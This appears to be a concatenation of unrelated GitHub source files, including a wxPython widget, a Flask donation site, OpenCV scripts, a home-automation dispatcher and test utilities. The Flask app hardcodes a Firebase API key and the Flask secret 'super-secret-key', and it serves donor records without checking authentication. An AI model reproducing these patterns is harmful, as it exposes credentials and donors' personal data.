self._iconWidth:\n            _x = self._iconWidth\n\n        if _y < self._iconHeight:\n            _y = self._iconHeight\n\n        return wx.Size(_x, _y)\n\n    def draw_vertical_gradient(self, dc, rect):\n        \"\"\"\n        Gradient fill from colour 1 to colour 2 from top to bottom.\n\n        :param dc: an instance of :class:`wx.DC`;\n        :param rect: the :class:`CaptionBar` client rectangle.\n        \"\"\"\n\n        if rect.height < 1 or rect.width < 1:\n            return\n        dc.SetPen(wx.TRANSPARENT_PEN)\n        # calculate gradient coefficients\n        _col2 = self._style.get_second_colour()\n        _col1 = self._style.get_first_colour()\n        dc.GradientFillLinear(rect, _col1, _col2, wx.NORTH)\n\n    def draw_horizontal_gradient(self, dc, rect):\n        \"\"\"\n        Gradient fill from colour 1 to colour 2 from left to right.\n\n        :param dc: an instance of :class:`wx.DC`;\n        :param rect: the :class:`CaptionBar` client rectangle.\n        \"\"\"\n\n        if rect.height < 1 or rect.width < 1:\n            return\n        dc.SetPen(wx.TRANSPARENT_PEN)\n        _col2 = self._style.get_second_colour()\n        _col1 = self._style.get_first_colour()\n        dc.GradientFillLinear(rect, _col1, _col2, wx.WEST)\n\n    def draw_single_colour(self, dc, rect):\n        \"\"\"\n        Single colour fill for :class:`CaptionBar`.\n\n        :param dc: an instance of :class:`wx.DC`;\n        :param rect: the :class:`CaptionBar` client rectangle.\n        \"\"\"\n\n        if rect.height < 1 or rect.width < 1:\n            return\n\n        dc.SetPen(wx.TRANSPARENT_PEN)\n\n        # draw simple rectangle\n        
dc.SetBrush(wx.Brush(self._style.get_first_colour(), wx.BRUSHSTYLE_SOLID))\n dc.DrawRectangle(rect.x, rect.y, rect.width, rect.height)\n\n def draw_single_rectangle(self, dc, rect):\n \"\"\"\n Single rectangle for :class:`CaptionBar`.\n\n :param dc: an instance of :class:`wx.DC`;\n :param rect: the :class:`CaptionBar` client rectangle.\n \"\"\"\n\n if rect.height < 2 or rect.width < 1:\n return\n\n # single frame, set up internal fill colour\n\n if self._style.get_caption_style() == CaptionBarStyle.CAPTIONBAR_RECTANGLE:\n _colour = self.GetParent().GetBackgroundColour()\n _br = wx.Brush(_colour, wx.BRUSHSTYLE_SOLID)\n else:\n _colour = self._style.get_first_colour()\n _br = wx.Brush(_colour, wx.BRUSHSTYLE_SOLID)\n\n # setup the pen frame\n\n _pen = wx.Pen(self._style.get_second_colour())\n dc.SetPen(_pen)\n dc.SetBrush(_br)\n dc.DrawRectangle(rect.x, rect.y, rect.width, rect.height - 1)\n\n _bgpen = wx.Pen(self.GetParent().GetBackgroundColour())\n dc.SetPen(_bgpen)\n dc.DrawLine(rect.x, rect.y + rect.height - 1, rect.x + rect.width,\n rect.y + rect.height - 1)\n\n def on_erase_bg(self, evt):\n evt.Skip()\n","repo_name":"yiyunzhi/pxcmbt_v36","sub_path":"framework/gui/widgets/panel_caption_bar.py","file_name":"panel_caption_bar.py","file_ext":"py","file_size_in_byte":17548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10694655444","text":"from flask import Flask, render_template, request, redirect, url_for, flash\r\nfrom flask import session as login_session\r\nimport pyrebase\r\nimport os\r\n\r\napp = Flask(__name__, template_folder='templates', static_folder='static')\r\napp.config['SECRET_KEY'] = 'super-secret-key'\r\n\r\n#Code goes below here\r\nconfig = {\r\n 'apiKey': \"AIzaSyCC2ny6fQZx7MsL9dLcdDkFLfTX6TMWHaw\",\r\n 'authDomain': \"lissan-y2-f.firebaseapp.com\",\r\n 'projectId': \"lissan-y2-f\",\r\n 'storageBucket': \"lissan-y2-f.appspot.com\",\r\n 'messagingSenderId': \"565841630605\",\r\n 'appId': \"1:565841630605:web:c4833274438653ba2e99c4\",\r\n 'databaseURL':'https://lissan-y2-f-default-rtdb.europe-west1.firebasedatabase.app'\r\n }\r\n\r\nfirebase = pyrebase.initialize_app(config)\r\nauth = firebase.auth()\r\ndb=firebase.database()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n@app.route('/', methods=['GET','POST'])\r\ndef index():\r\n result=''\r\n if request.method=='POST':\r\n num=int(request.form['num'])\r\n students=int(num/1500)\r\n books=int(num/2500)\r\n result1= num\r\n result2=students\r\n info =[]\r\n if num > 1500 and num < 2500:\r\n info=[\"By donating this amount of money you are helping this amount of woman \",\"\"]\r\n\r\n elif num >= 2500 :\r\n info=[\"This donation will cover the costs of \",\"students per year\",\"the number of books units in a text book, or enrichment materials\"]\r\n\r\n elif num < 1500:\r\n info = [\"you can contrbute to hire more staff members to improve our lessons quality\"]\r\n return render_template('index.html', result1 = result1,result2=result2,info=info)\r\n return render_template('index.html', result = None)\r\n\r\n\r\n\r\n\r\n@app.route('/donate', methods=['GET', 'POST'])\r\ndef donate():\r\n if request.method=='POST':\r\n name=request.form['name']\r\n email=request.form['email']\r\n message=request.form['message']\r\n user={\"name\":name,\"email\":email,\"message\":message}\r\n db.child('donations').push(user)\r\n return redirect (url_for('index'))\r\n return render_template(\"donate.html\")\r\n\r\n@app.route('/info', methods=['GET','POST'])\r\ndef info():\r\n if 
request.method=='POST':\r\n        donations=db.child('donations').get().val()\r\n        return render_template('info.html',donations=donations)\r\n    else:\r\n        return render_template('admin.html')\r\n\r\n\r\n\r\n@app.route('/admin',methods=['GET','POST'])\r\ndef admin():\r\n    error=''\r\n    if request.method=='POST':\r\n        name=request.form['name']\r\n        last_name=request.form['last_name']\r\n        email=request.form['email']\r\n        password=request.form['password']\r\n        phone=request.form['phone']\r\n\r\n\r\n        # COMMENTED OUT TO ASSURE ONLY ONE USER (ADMIN) IN THE DATABASE-rani \r\n        try:\r\n            # login_session['user']=auth.create_user_with_email_and_password(email, password)\r\n            # user={'email':email, 'password':password}\r\n            # UID = login_session['user']['localId']\r\n            # db.child('Users').child(UID).set(user)\r\n            login_session['user']=auth.sign_in_with_email_and_password(email, password)\r\n            return render_template('info.html')\r\n        except:\r\n            error='Authentication failed'\r\n            return render_template('admin.html')\r\n    else:\r\n        return render_template('admin.html')\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Code goes above here\r\n\r\nif __name__ == '__main__':\r\n    app.run(debug=True)","repo_name":"meet-projects/Y2-GroupF-Team1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72606353719","text":"import logging\nimport dlplan\nimport os\n\nfrom learner.src.domain_data.domain_data_factory import DomainDataFactory\nfrom learner.src.instance_data.instance_data import InstanceData\nfrom learner.src.util.command import create_experiment_workspace\nfrom learner.src.util.file_system import remove_directory\n\n\nclass InstanceDataFactory:\n    def make_instance_datas(self, config):\n        cwd = os.getcwd()\n        vocabulary_info = None\n        instance_datas = []\n        for instance_information in config.instance_informations:\n            logging.info(f\"Constructing InstanceData for filename {instance_information.filename}\")\n            create_experiment_workspace(instance_information.workspace, False)\n            # change working directory to put planner output files in correct directory\n            os.chdir(instance_information.workspace)\n            result = dlplan.generate_state_space(str(config.domain_filename), str(instance_information.filename), vocabulary_info, len(instance_datas), config.max_time_per_instance)\n            remove_directory(instance_information.workspace)\n            print(instance_information.workspace)\n            if result.exit_code != dlplan.GeneratorExitCode.COMPLETE:\n                continue\n            state_space = result.state_space\n            if vocabulary_info is None:\n                # We obtain the parsed vocabulary from the first instance\n                vocabulary_info = state_space.get_instance_info().get_vocabulary_info()\n            domain_data = DomainDataFactory().make_domain_data(config, vocabulary_info)\n            if len(state_space.get_states()) > config.max_states_per_instance:\n                continue\n            goal_distances = state_space.compute_goal_distances()\n            if goal_distances.get(state_space.get_initial_state_index(), None) is None:\n                print(\"Unsolvable.\")\n                continue\n            elif set(state_space.get_states().keys()) == set(state_space.get_goal_state_indices()):\n                print(\"Trivially solvable.\")\n                continue\n            elif not config.closed_Q and state_space.get_initial_state_index() in set(state_space.get_goal_state_indices()):\n                print(\"Initial state is goal.\")\n                continue\n            else:\n                print(\"Num states:\", len(state_space.get_states()))\n                instance_data = InstanceData(len(instance_datas), domain_data, dlplan.DenotationsCaches(), 
instance_information)\n instance_data.set_state_space(state_space, create_dump=True)\n instance_data.set_goal_distances(goal_distances)\n if config.closed_Q:\n instance_data.initial_s_idxs = [s_idx for s_idx in state_space.get_states().keys() if instance_data.is_alive(s_idx)]\n else:\n instance_data.initial_s_idxs = [state_space.get_initial_state_index(),]\n instance_datas.append(instance_data)\n # Sort the instances according to size and fix the indices afterwards\n instance_datas = sorted(instance_datas, key=lambda x : len(x.state_space.get_states()))\n for instance_idx, instance_data in enumerate(instance_datas):\n instance_data.id = instance_idx\n # change back working directory\n os.chdir(cwd)\n return instance_datas, domain_data\n","repo_name":"ipc2023-learning/repo08","sub_path":"learning/learner/src/instance_data/instance_data_factory.py","file_name":"instance_data_factory.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21426426666","text":"import cv2\nimport numpy as np\nfrom imutils import contours as cnts\n# Define square size\nmin_square_size = 987\n# Read Image\nimg = cv2.imread('base6.png')\n# Threshold and find edges\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# Threshold the image - segment white background from post it notes\n_, thresh = cv2.threshold(gray, 250, 255, cv2.THRESH_BINARY_INV);\n# Find the contours\ncontours, _ = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n\n# Create a list for post-it images\nimages = []\n# Iterate through the contours in the image\nprint(len(contours))\n\n\n(contours, _) = cnts.sort_contours(contours, method=\"top-to-bottom\")\n\nbins = \"\"\nfor contour in contours:\n area = cv2.contourArea(contour)\n # If the contour is not really small, or really big\n h,w = img.shape[0], img.shape[1]\n if area > min_square_size and area < h*w-(2*(h+w)):\n # Get the four corners of the contour\n epsilon = .1 * cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, epsilon, True)\n # Draw the point\n # print(approx.shape)\n for point in approx: cv2.circle(img, tuple(point[0]), 2, (255,0,0), 2)\n # Warp it to a square\n pts1 = np.float32(approx)\n pts2 = np.float32([[0,0],[300,0],[300,300],[0,300]])\n M = cv2.getPerspectiveTransform(pts1,pts2)\n dst = cv2.warpPerspective(img,M,(300,300))\n print(dst[10][10][0])\n bins += str(int(dst[10][10][0] == 255))\n # Add the square to the list of images\n images.append(dst.copy())\n# print(len(images))\nprint(bins)\nprint(\"1100100011101010001010111\")\n# Show the complete image with dots on the corners\ncv2.imshow('img', img)\n# cv2.imwrite('/home/stephen/Desktop/corners.png', img)\ncv2.waitKey()\n\n# # Write the images to the desktop\n# idx = 0\n# for image in images:\n# # cv2.imwrite('/home/stephen/Desktop/'+str(idx)+'.png', image)\n# # print(img[20][20])\n# cv2.imshow('img', image)\n# cv2.waitKey()\n # idx += 1\n# cv2.destroyAllWindows()","repo_name":"ethanbond64/chainlink_iris","sub_path":"learningcv/contours.py","file_name":"contours.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"28278886849","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as fh:\n long_description = \"\\n\" + fh.read()\n\nVERSION = 
'1.0'\nDESCRIPTION = 'A powerful os operating system for python with exclusive functions'\n\n# Setting up\nsetup(\n name=\"vidstream\",\n version=VERSION,\n author=\"Aarav Shreshth\",\n author_email=\"aaravshreshth1503@gmail.com\",\n description=DESCRIPTION,\n long_description=\"A powerful os\",\n packages=find_packages(),\n install_requires=['opencv-python', 'pyautogui'],\n keywords=['python', 'video', 'stream', 'video stream', 'camera stream', 'sockets'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)\n","repo_name":"aarav-shreshth/Pyosleep","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73038177079","text":"\"\"\"Forms for Pet Adoption Agency.\"\"\"\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SelectField, FloatField, BooleanField\nfrom wtforms.validators import InputRequired, AnyOf, URL, Optional, NumberRange\n\n\nclass AddPetForm(FlaskForm):\n \"\"\"Form for adding new pets.\"\"\"\n\n name = StringField(\"Pet Name\", validators=[InputRequired()])\n species = SelectField(\"Species\", choices=[(\"cat\", \"Cat\"), (\"dog\", \"Dog\"), (\"porcupine\", \"Porcupine\")], validators=[InputRequired()])\n photo_url = StringField(\"Photo URL\", validators=[URL(), Optional()])\n age = FloatField(\"Age (in human years)\", validators=[NumberRange(min=0, max=30), Optional()])\n notes = StringField(\"Notes\", validators=[Optional()])\n\nclass EditPetForm(FlaskForm):\n \"\"\"Form for editing pets.\"\"\"\n\n photo_url = StringField(\"Photo URL\", validators=[URL(), Optional()])\n notes = StringField(\"Notes\", validators=[Optional()])\n available = BooleanField(\"Available\")","repo_name":"keante032/SB-24.1.15","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74361558519","text":"import os\nimport json\nimport sys\nfrom modules.file_helper import FileHelper\nfrom modules.html_loader import HtmlLoader\nfrom modules.extracter import Extracter\n\n\ndef format_print(json_string):\n print(json.dumps(json_string, indent=2, encoding='utf8'))\n\ndef get_content(soup):\n if soup.string is not None:\n return soup.string if soup.string != '\\n' else u''\n\n if len(soup.contents) == 0:\n return u''\n\n values = []\n for item in soup.contents:\n values.extend(get_content(item))\n return values\n\ndef get_cell_content(td_soup):\n if td_soup.string is not None:\n return td_soup.string if td_soup.string != '\\n' else u''\n\n values = []\n for item in td_soup.contents:\n values.extend(get_content(item))\n return u\"\".join(values).replace('\\n', '').replace(u' ', u'')\n\nif __name__ == '__main__':\n # if len(sys.argv) != 2:\n # print(\"Usage: %s \" % sys.argv[0])\n # exit(-1)\n info_id = '3f0a2dd7-1e13-4929-961b-a07808811650' # sys.argv[1]\n\n file_helper = FileHelper()\n html_loader = HtmlLoader()\n extracter = Extracter()\n\n page_dir = \"debug_pages/\"\n # page_path = os.path.join(page_dir, 'a9e29e7b-da58-47cc-a9a4-0d9340a62282' + '.html')\n page_path = os.path.join(page_dir, info_id + '.html')\n\n if not os.path.exists(page_path) or not os.path.isfile(page_path):\n print(\"info id 
not exists\")\n exit(-2)\n\n soup = html_loader.beautiful_page_content(file_helper.read(page_path))\n detail = extracter.extract_detail(soup)\n format_print(detail)\n list_item = {\n 'tender_id': info_id,\n 'pubdate': '2013-10-28 00:00:00',\n 'page_url': 'http://www.spprec.com/sczw/InfoDetail/Default.aspx?InfoID=' + info_id + '&CategoryNum=005001003',\n 'page_num': 0\n }\n extracter.save_extracted_data(list_item, detail)\n","repo_name":"alvin1/crawler","sub_path":"extract_debug_page.py","file_name":"extract_debug_page.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21936455964","text":"\n##\n# @defgroup dispatcher_package\n# @brief dynamic reloading of user modules, data frames distribution between\n# hardware and the user modules\n#\n#\n# @{\n\n##\n# @defgroup dispatcher\n# @brief reloading of user modules, intercommunication of those modules between\n# hardware\n# @{\n\nfrom hardware import serialHardware\nfrom threading import Thread,Lock\nimport time\nimport commandTable\nfrom aplications import baseClass\nimport imp \nimport os\nimport logging\nimport array\nimport events\nimport inspect, os\nimport config\nimport threading\nimport collections\npath = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + \"/..\" # script directory\n\n\n##\n# @brief Dynamic reloading user modules and message distribution between\n# hardware and those modules \n#\n# Modules are added/reloaded automatically and on the fly (no restart needed)\n#\n# Only one instance is used in whole application. \nclass dispatcher:\n ##\n # @brief message codes to user readable string conversion table\n _table = {serialHardware.Hardware.NEW_DATA : \"NEW_DATA\", \n serialHardware.Hardware.ERROR: \"ERROR\",\n serialHardware.Hardware.TX_FAILED: \"TX_FAILED\",\n serialHardware.Hardware.TX_FINISHED: \"TX_FINISHED\"}\n\n ## \n # @brief Initialize instance variables, create dedicated thread and\n # create hardware class instance\n def __init__(self):\n ## @brief hardware instance\n self._hw = serialHardware.Hardware(self._handle_events) #hardware connector \n ## @brief dedicated thread\n self._thread = Thread(target=self._loop,name=\"dispatcher\")\n #self._thread.setDaemon(True)\n ## @brief instance logger\n self._log = logging.getLogger(\"root.dispatcher\")\n self._lock = Lock()\n ## @brief list of user modules\n self._objects = {}\n ## @brief command table\n self._command_table = commandTable.commands\n self._log_apps = logging.getLogger(\"root.apps\")\n \n self._var = threading.Event()\n self._var.set()\n pass\n \n ##\n # @brief open hardware and start dedicated thread\n def start(self):\n self._hw.open(config.config_dict[\"usb\"])\n self._thread.start()\n pass\n \n def close(self):\n self._log.debug(\"Closing\")\n self._hw.close()\n self._var.clear()\n \n self._thread.join()\n self._log.debug(\"thread closed\")\n \n self._log.debug(\"stopping timers\")\n for a in self._objects.values():\n f = a[0]\n f.stop_timer()\n \n\n \n ##\n # @brief format serial data to command and payload\n def _format_serial_data(self, args):\n pipe = args[0]\n data = args[1]\n if len(data) < 2:\n self._log.error(\"Invalid tx failed packet - too short payload\")\n return\n command = ord(data[0]) | ord(data[1]) << 8\n data = data[2:len(data)]\n pole = array.array(\"B\")\n pole.fromstring(data.tostring())\n t = (self, pipe, command ,pole)\n return t\n \n ##\n # @brief receive callbacks from @ref hardware class and 
distribute\n # data to the dynamically imported user modules\n #\n def _handle_events(self, args):\n code = args[0]\n args = args[1]\n \n # tuple with self and data needed by callbacks\n arg = None\n pipe = -1\n if code == self._hw.NEW_DATA:\n #dispatcher, pipe, command, payload\n arg = self._format_serial_data(args)\n pipe = arg[1]\n self._log.debug(\"new packet pipe %d; command %d; load \" + str(arg[3].tolist()),pipe,arg[2])\n if (arg[2] == self.command_table().STARTUP):\n self._log.warning(\"pipe %d (%s) firmware just started-up\" % (pipe,self.command_table().stations[pipe]))\n pass\n elif code == self._hw.TX_FINISHED:\n #pipe number\n # dispatcher, pipe\n arg = (self,args)\n pipe = args\n self._log.debug(\"Packet delivered to pipe %d\", pipe)\n pass\n elif code == self._hw.TX_FAILED:\n #dispatcher, pipe, command , payload\n arg = self._format_serial_data(args)\n pipe = arg[1]\n self._log.warning(\"packet delivery failed %d; command %d; load \" + str(arg[3].tolist()),pipe,arg[2])\n pass\n elif code == self._hw.ERROR:\n #error code\n # dispatcher, erroer code\n arg = (self, args)\n self._log.warning(\"Error from hardware \" + str(args))\n pass\n else:\n self._log.warning(\"_handle_events with invalid serialHardware code\")\n return\n\n exp = self._table[code]\n \n self._lock.acquire()\n for a in self._objects.values():\n f = a[0]\n lst = f.pipe_list\n if not pipe in lst and not code == self._hw.ERROR:\n continue\n \n # helper function table \n vmt = {}\n vmt[self._hw.TX_FAILED] = f.virtual_tx_failed\n vmt[self._hw.TX_FINISHED] = f.virtual_tx_finished\n vmt[self._hw.ERROR] = f.virtual_error\n vmt[self._hw.NEW_DATA] = f.virtual_new_data\n cb = vmt[code]\n\n try:\n if cb is not None:\n # variable number of arguments as tuple\n cb(*arg)\n except:\n self._log.exception(\"Application module \\\"%s\\\" raised exception in \\\"%s\\\" handler\", f._name, exp)\n f._log.exception(\"Raised exception\")\n self._lock.release()\n \n \n ##\n # @brief @ref _thread code checks for changes in user modules and @ref command_table\n # and reloads changed modules or table on the fly\n def _loop(self):\n while self._var.isSet(): \n try:\n self._lock.acquire()\n self._objects = self._get_objects(self._objects)\n try:\n reload(commandTable)\n t = commandTable.commands.REFRESH_PERIOD\n except:\n self._log.exception(\"Error in reloading command table\")\n self._command_table = commandTable.commands\n self._lock.release()\n time.sleep(t)\n except:\n events.events.event.register_exit()\n \n \n ##\n # @brief refresh list of user modules in package @ref aplications\n # search for new modules and dynamically import them and modified modules\n # are dynamically reimported\n def _get_objects(self, objects):\n # @type objects: {}\n filename = os.path.abspath(path + \"/aplications\")\n a = os.listdir(filename)\n a.remove(\"baseClass.py\")\n a.remove(\"__init__.py\")\n lst =[]\n b = \"\"\n for b in a:\n if not b.endswith(\".py\"):\n lst.append(b)\n \n for b in lst:\n a.remove(b)\n \n for b in a:\n name = filename + \"/\" +b\n scrname = b.rstrip(\".py\")\n mtime = os.path.getmtime(name)\n jo = False\n if scrname in objects:\n t = objects[scrname]\n t = t[1]\n if mtime == t:\n continue\n else:\n jo = True\n self._log.info(\"new module \\\"%s\\\" was added\", scrname)\n \n try:\n c = imp.load_source(\"modul\", name)\n c = c.app(scrname)\n tup = (c, mtime)\n objects[scrname] = tup\n except:\n self._log.exception(\"module \\\"%s\\\" raised exception during import\",scrname)\n if jo is False:\n self._log.info(\"module \\\"%s\\\" 
was changed\", scrname)\n\n \n return objects \n \n ##\n # @brief Used by user modules to send arbitrary data to the wireless modules\n # @param pipe [int] Logical address of wireless module \n # @param command [int] Arbitrary command from @ref command_table\n # @param data [int/character array] User data array of bytes or integer which is automatically\n # converted to the byte of array\n # @param integerLength [int] If data is integer it will be converted to specified \n # number of bytes\n def send_packet(self, pipe, command, data = None, integerLength = None):\n # @type pipe: int \n # @type command: int\n # @type data: array.array(\"B\") \n payload = array.array(\"c\")\n \n if data is not None: \n if isinstance(data,array.array):\n payload.fromstring(data.tostring())\n if isinstance(data, int):\n t = data \n if type(integerLength) is int:\n while integerLength > 0:\n payload.append(chr(t & 0xff))\n t >>= 8\n integerLength -= 1\n \n else: \n while t:\n payload.append(chr(t & 0xff))\n t >>= 8\n \n command |= self._command_table.WRITE_FLAG \n payload.insert(0,chr((command >> 8) & 0xff))\n payload.insert(0,chr(command & 0xff))\n \n self._log.info(\"send ack payload pipe %d, command %d, load %s\",pipe,command,str(data))\n self._log.info(\"send ack payload raw: %s\" ,str(payload))\n self._hw.put_ack_payload(pipe, payload)\n \n pass\n \n ##\n # @brief returns command table which is automatically reloaded after modification\n # on the fly\n @property\n def command_table(self):\n return self._command_table\n \n #@}\n \n#@}\n","repo_name":"kubanecxxx/homeautomation","sub_path":"openwrt/python/homeAutomation/dispatcher/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":9822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39505227876","text":"import random\n\nfrom wildcard.util.parse_annotations import parse_all\n\n\"\"\"\nVariety of utils for preparing data for model\n\"\"\"\n\nrandom.seed(42)\n\ndef split_data(utterances, split=[0.8, 0.2]):\n \"\"\"\n Split data into train/test according to provided ratio\n :param split: Split to use for train/test\n :return:\n \"\"\"\n random.shuffle(utterances)\n bound = int(len(utterances) * split[0])\n train = utterances[:bound]\n test = utterances[bound:]\n return train, test\n","repo_name":"mihail911/wildcard","sub_path":"wildcard/util/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33484889667","text":"import csv\r\na=0\r\nwith open(\"Marks.csv\",\"r\")as f:\r\n csv=csv.reader(f)\r\n '''for row in csv:\r\n print(row)'''\r\n '''col=next(csv)\r\n print(col)'''\r\n for i in csv:\r\n a+=1\r\n print(\"No of row:\",a)\r\n \r\n\r\n","repo_name":"RaaghavNaraayan/Skl-work","sub_path":"readmarks.py","file_name":"readmarks.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11611235369","text":"\n# test12\n\nimport math\n\n\n# ①\nclass Apple:\n\t# インスタンス化\n\t# ①色、②重さ、③産地、④状態\n\tdef __init__(self, color, weight, origin, status):\n\t\tself.color = color\n\t\tself.weight = weight\n\t\tself.origin = origin\n\t\tself.status = status\n\n# 実処理\napple = Apple(\"red\", 400, \"青森\", \"flesh\")\nprint(apple.color)\nprint(apple.weight)\nprint(apple.origin)\nprint(apple.status)\n\n\n\n# ②\nclass Circle:\n\tdef __init__(self, 
rad):\n\t\tself.radius = rad\n\n\t# 円の面積を算出\n\tdef area(self):\n\t\treturn (self.radius * self.radius) * math.pi\n\n# 実処理\ncircle = Circle(5)\nprint(circle.radius)\nprint(circle.area())\n\n\n\n# ③\nclass Triangle:\n\tdef __init__(self, l, h):\n\t\tself.length = l\n\t\tself.height = h\n\n\t# 三角形の面積を算出\n\tdef area(self):\n\t\treturn (self.length * self.height) / 2\n\n# 実処理\ntriangle = Triangle(10, 4)\nprint(triangle.length)\nprint(triangle.height)\nprint(triangle.area())\n\n\n\n# ④\nclass Hexagon:\n\t# 正六角形の1辺の長さを設定\n\tdef __init__(self, l):\n\t\tself.len = l\n\n\t# 外周の長さを算出\n\tdef calculate_perimeter(self):\n\t\treturn self.len * 6\n\n# 実処理\nhexagon = Hexagon(6)\nprint(hexagon.len)\nprint(hexagon.calculate_perimeter())\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nomura-takahiro/study","sub_path":"test/test12.py","file_name":"test12.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30772048793","text":"import inspect\nimport time\nimport traceback\n\nfrom proboscis import asserts\n\nfrom fuelweb_test import logger\nfrom fuelweb_test import logwrap\nfrom fuelweb_test import settings\n\n\n@logwrap\ndef get_yaml_to_json(node_ssh, file):\n cmd = (\"python -c 'import sys, yaml, json; json.dump(\"\n \"yaml.load(sys.stdin),\"\n \" sys.stdout)' < {0}\").format(file)\n err_res = ''\n res = node_ssh.execute(cmd)\n err_res.join(res['stderr'])\n asserts.assert_equal(\n res['exit_code'], 0,\n 'Command {0} execution failed '\n 'with message {1}'.format(cmd, err_res))\n return res['stdout']\n\n\n@logwrap\ndef nova_service_get_pid(node_ssh, nova_services=None):\n pid_dict = {}\n for el in nova_services:\n cmd = \"pgrep {0}\".format(el)\n pid_dict[el] = node_ssh.execute(cmd)['stdout']\n logger.debug('current dict is {0}'. 
format(pid_dict))\n return pid_dict\n\n\n@logwrap\ndef check_if_service_restarted(node_ssh, services_list=None,\n pattern='(re)?start', skip=0):\n if services_list:\n # from the log file {2}, scan all lines after line {0} with the\n # pattern {1} to find restarted services, print their names to stdout\n cmd = (\"awk 'NR >= {0} && /{1}/ {{print $11}}' {2}\"\n .format(skip, pattern, '/var/log/puppet.log'))\n res = ''.join(node_ssh.execute(cmd)['stdout'])\n logger.debug('Next services were restarted {0}'.format(res))\n for service in services_list:\n asserts.assert_true(\n any(service in x for x in res),\n 'Seems service {0} was not restarted {1}'.format(service, res))\n\n\n@logwrap\ndef pull_out_logs_via_ssh(admin_remote, name,\n logs_dirs=('/var/log/', '/root/', '/etc/fuel/')):\n def _compress_logs(_dirs, _archive_path):\n cmd = 'tar --absolute-names --warning=no-file-changed -czf {t} {d}'.\\\n format(t=_archive_path, d=' '.join(_dirs))\n result = admin_remote.execute(cmd)\n if result['exit_code'] != 0:\n logger.error(\"Compressing of logs on master node failed: {0}\".\n format(result))\n return False\n return True\n\n archive_path = '/var/tmp/fail_{0}_diagnostic-logs_{1}.tgz'.format(\n name, time.strftime(\"%Y_%m_%d__%H_%M_%S\", time.gmtime()))\n\n try:\n if _compress_logs(logs_dirs, archive_path):\n if not admin_remote.download(archive_path, settings.LOGS_DIR):\n logger.error((\"Downloading of archive with logs failed, file\"\n \"wasn't saved on local host\"))\n except Exception:\n logger.error(traceback.format_exc())\n\n\n@logwrap\ndef store_astute_yaml(env):\n func_name = get_test_method_name()\n for node in env.nodes().slaves:\n nailgun_node = env.fuel_web.get_nailgun_node_by_devops_node(node)\n if node.driver.node_active(node) and nailgun_node['roles']:\n try:\n remote = env.get_ssh_to_remote_by_name(node.name)\n filename = '{0}/{1}-{2}.yaml'.format(settings.LOGS_DIR,\n func_name, node.name)\n logger.info(\"Storing {0}\".format(filename))\n if not remote.download('/etc/astute.yaml', filename):\n logger.error(\"Downloading 'astute.yaml' from the node \"\n \"{0} failed.\".format(node.name))\n except Exception:\n logger.error(traceback.format_exc())\n\n\n@logwrap\ndef get_test_method_name():\n # Find the name of the current test in the stack. 
It can be found\n # right under the class name 'NoneType' (when proboscis\n # run the test method with unittest.FunctionTestCase)\n stack = inspect.stack()\n method = ''\n for m in stack:\n if 'self' in m[0].f_locals:\n if m[0].f_locals['self'].__class__.__name__ == 'NoneType':\n break\n method = m[3]\n return method\n","repo_name":"FIWARE/ops.Fuel-main-dev","sub_path":"fuelweb_test/helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28906523028","text":"from setuptools import setup, Extension\nfrom torch.utils import cpp_extension\n\ntorch_library_paths = cpp_extension.library_paths(cuda=False)\n\n\ndef build(setup_kwargs):\n \"\"\"\n This function is mandatory in order to build the extensions.\n \"\"\"\n setup_kwargs.update({\n 'ext_modules': [\n cpp_extension.CppExtension(\n 'torch_persistent_homology.persistent_homology_cpu',\n ['torch_persistent_homology/perisistent_homology_cpu.cpp'],\n extra_link_args=[\n '-Wl,-rpath,' + library_path\n for library_path in torch_library_paths]\n )\n ],\n 'cmdclass': {\n 'build_ext': cpp_extension.BuildExtension\n }\n 